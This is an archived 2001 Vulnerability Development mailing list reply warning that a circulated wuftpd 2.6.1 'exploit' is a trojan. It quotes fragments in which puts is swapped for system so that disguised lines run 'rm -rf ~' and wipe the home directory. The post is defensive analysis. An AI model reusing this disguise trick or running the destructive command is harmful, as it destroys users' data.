Vulnerability Development mailing list archives

Previous By Date Next
Previous By Thread Next

Re: wuftpd 2.6.1 advisory/exploit

From: mrcdz <mrcdz () datavibe net>
Date: Wed, 19 Sep 2001 13:57:51 -0400
You are correct, this is a spoof.
Do you think Carolyn would post something like this? :)

-- from "exploit":
 *
 * Demonstrates a flaw in the pre-authentication code of
 * wuftpd 2.6.x which allows us to gain control of the
 * target process by displacing a saved frame pointer.
 *

Obviously this is not a real vulnerability in wuftpd 2.6.1 nor an exploit.
If you look behind all the garble, you'll see this:
 
sprintf((char *)attack+4+i, "%c", (unsigned long)puts >> i * 8 & 0xff);

and then:

puts("echo ~ ok, it seems to have worked... remember: \");
puts("rm -rf is not elite ~");

puts(3) function has been overwritten with the address of system(3), where
anyone skimming through the source code would think it is simply printing
those two lines. (notice the backslash on the first, either a coding mistake
or to 'deter script kids'.) It is actually executing them via system(3).

Please do not run this code. Your home directory will be wiped out.
And if $HOME is set to '/'; Well then, you're in big trouble.

On Wed, Sep 19, 2001 at 08:38:14AM -0700, Blue Boar wrote:

Hey, I'm told that this exploit like eats your hard drive or something.
Caveat emptor and all, but I figured since I actually heard about this,
I'd let you know.  I guess it's a spoofed note.

                                      BB
Previous By Date Next
Previous By Thread Next

Current thread: